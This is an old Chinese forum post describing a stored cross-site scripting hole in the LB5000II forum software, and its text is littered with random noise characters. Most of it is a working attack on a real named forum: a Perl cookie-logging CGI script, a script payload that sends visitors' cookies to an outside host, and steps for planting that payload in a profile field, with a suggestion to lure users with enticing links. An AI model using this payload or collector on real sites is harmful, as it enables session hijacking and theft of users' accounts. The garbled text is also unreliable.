漏洞描述:
$ @! r# H! X: S6 Q5 P0 U+ f LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
& z- H3 j* g' u% h版本是LB5000II v20317b,可以http://www.leoboard.com下载。 y( |) O& x3 B- j; V% y) b# G
其注册模块未过滤用户资料 最高学历:职业状况:等注册信息 1 ~+ x" n* Y4 J1 F) j3 c
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript> 5 Q# ?7 _6 ?3 V. N c4 }
进行攻击,进一步可以通过某中方式收集。测试通过
4 @* ?$ o( f! f' m" t/ i) ^- e测试程序:
{0 x' j3 N' ^ 参考漏洞描述。 ; p2 F1 R! D0 h0 D+ R7 R! h2 z
解决方案: % |. A0 I" L) J7 b
对用户提交的资料进行过滤
# `/ g+ F6 m2 y" P 1 r$ s6 N6 a, w7 w
% C! f/ }3 T2 M( R0 ^! I
请在s8s8论坛访问 ' T0 i) t: m( I: k4 h7 D+ X& d
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
+ ]: o! L1 s; Z3 P2 }4 X: |那么你在s8s8.net 的cookie将被我所获取.
4 W3 _2 `( @. y7 { r#!/usr/bin/perl
' e+ [0 |1 J: Y1 n#leo.cgi
b; C% R% x1 ^( E7 \; O8 W% d$url="http://www.s8s8.net";; 7 ? I6 J* s1 ]8 G
$method=$ENV{"REQUEST_METHOD"}; , P6 g1 g* u, h$ V
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};} : U/ n) v# I" Y1 p& L$ {
else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
, C; {, a6 ]8 y. f* {0 M$remote_addr=$ENV{"REMOTE_ADDR"};
* |, A! P% Q' `4 W8 p& q) B6 _$buffer=~tr/+/ /;
3 S$ I! v6 Q I9 {& x0 e$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; 3 k) Q8 N( |6 @ j: R- k
$buffer=$buffer."|$remote_addr\n"; 9 J# w( s9 z: W
open(FILE,">>leo.txt"); 5 d( D5 F y/ E G
print FILE $buffer; / ?# i( }6 L- v1 j: T! z" \2 w7 U* F" K t
close(FILE); 3 ?. @" I5 u. U7 Z: q
print "Location:$url\n\n";
1 T/ h4 }4 n" P3 m- {& G上面是我的cookie收集脚本
2 i4 K) U8 A s" w" d j------------------------------------------------------------------------------ ) c( R1 I* H, h9 [/ j* c
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试 2 t2 {% u6 M- M5 i/ e
用大刀队登陆s8s8论坛,编辑个人资料, 5 q4 i9 m7 l( ]( n" R A6 Y
用记事本打开编辑网页
9 v2 K, v F! R8 t<option value="中专">中专</option> 这一项改成 8 N$ h5 r, J0 d
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?'+documents.cookie)</s cript>">中专</option> & W5 P7 w' e4 V, K
z# f" ^$ w; q \. V8 P' t编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data"> 4 o7 z6 P; S: D* S p% x
改为
4 Y- ?5 P' i, x; q( i7 L6 G* F1 P<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data"> 1 w. n1 d1 m2 J) w
保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据,
; j% H0 ^3 x( |3 }' a& G这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。 & V2 ?( @; Y* m" }- F) l
为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击,
7 s$ j9 J: _* S什么算诱惑力呢,自己发挥吧。: [7 n9 J6 z& V$ d: W
|
/1 
|Archiver|小黑屋|宽带技术网
|网站地图 
粤公网安备44152102000001号 
发表于 2002-6-6 11:05:22
发表于 2002-6-24 19:03:26